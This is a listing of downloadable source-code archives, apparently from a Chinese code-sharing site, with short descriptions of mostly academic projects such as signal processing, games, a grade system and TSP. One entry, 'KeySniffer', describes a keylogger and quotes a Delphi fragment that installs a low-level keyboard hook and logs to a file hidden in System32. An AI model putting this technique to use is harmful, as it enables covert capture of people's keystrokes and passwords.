资源列表
OFDM_PTS_huadongchuang
- 引入滑动窗的PTS改进算法。出CCDF图,与未经过处理的原始曲线经行比较
CPU取得信息
- 一个使用VC++取得CPU信息的源程序。-VC made use of a CPU information of the source.
clear
- 清除数字游戏:计算机生成一个1-100范围内的5×5的二维数组 游戏开始时,计算机给出一个数字a,由玩家从该二维数组中选择两个数字 如果两者之和为a,则将这两个数字清除(相应数组元素置0) 然后计算机再给出一个数字b,由玩家再次从剩下的数组中选择两个数字 看是否能清除,依次进行直到数组中所有数字被清除,最后计算机显示游戏时间。-Clear numbers game: a computer-generated 1-100 within the scope of 5 × 5 game
syzCxueshengguanli
- 程序课题设计学生成绩管理系统!!大家多多关照-Procedures for program design student achievement management system!! More concern to everyone! !
Sets
- Descr iption: This program can be used to perform elementary operations on sets.
3
- 立体空间圆柱型模块使用例子,很不错的易语言源码,适合易语言爱好者使用。-Cylindrical three-dimensional space module uses the example of very good source of easy language, suitable for easy language enthusiasts.
LOST
- A method using the algorithm search A*
suspension-qcar1
- SIMULATION OF AN QUARTER AUTOMOTIVE SUSPENSION
1452
- matlab遗传算法求解多目标问题,flowshop调度问题-matlab genetic algorithm for multi-objective problems, flowshop scheduling problem
KeySniffer
- simple to you.... EX: uses KeySniffer ________ LogFileName := C:\Windows\System32\Log.txxt kHook := SetWindowsHookEx(WH_KEYBOARD_LL,@KbdProc,HInstance,0) -simple to you.... EX: uses KeySniffer ________ LogFileName := C:\Windows\
Calculator
- Development of GUI Calculator using Matlab platform
tsp问题
- 用c++编写tsp问题的解决方案 The Traveling Salesman Problem (TSP) is a widely mentioned classic case in data structure and algorithm, which can be solved in many methods.